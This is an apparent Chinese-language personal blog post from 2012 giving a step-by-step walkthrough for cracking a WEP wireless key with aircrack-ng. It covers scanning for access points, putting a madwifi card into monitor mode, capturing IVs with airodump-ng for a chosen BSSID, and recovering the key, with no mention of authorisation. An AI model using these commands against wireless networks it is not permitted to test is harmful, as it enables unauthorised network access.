分类:
2012-07-19 17:22:33
sudo apt-get install aircrack-ng
最重要的一点是:网线网卡驱动支持monitor模式。
我用的是madwifi驱动。
首先在普通模式下搜索一下网络。
sudo iwlist ath0 scan
找到信号比较强的ap,记录下bssid,essid,channel。
然后把网卡配置为monitor模式:
网上说用airmon start ath0就可以了,不过我的驱动好像不支持。
只能手动设备:
sudo wlanconfig ath0 create wlandev wifi0 wlanmode monitor
现在就可以抓包了:
sudo airodump-ng -i -w cap -u 1 -d bssid -c 6 ath0
-i 之记录ivs数据,只有这个数据对破解有用。
-u 每隔1s刷新一次
-d 指定bssid过滤
-c 指定channel
主要要等网络使用比较频繁的时候,才能抓到很多data,否则data增长很慢。
一般说可以用aireplay工具发送arp包来制造通信。
但是在我机子上没成功。
我是慢慢抓的,大概抓到40万个包就足够了。
然后进行破解:
aircrack-ng -a 1 -b bssid cap.ivs
-a 1是wep,2是wpa加密
-b 指定bssid
很快就key就会显示出来了。生活就是这么简单。
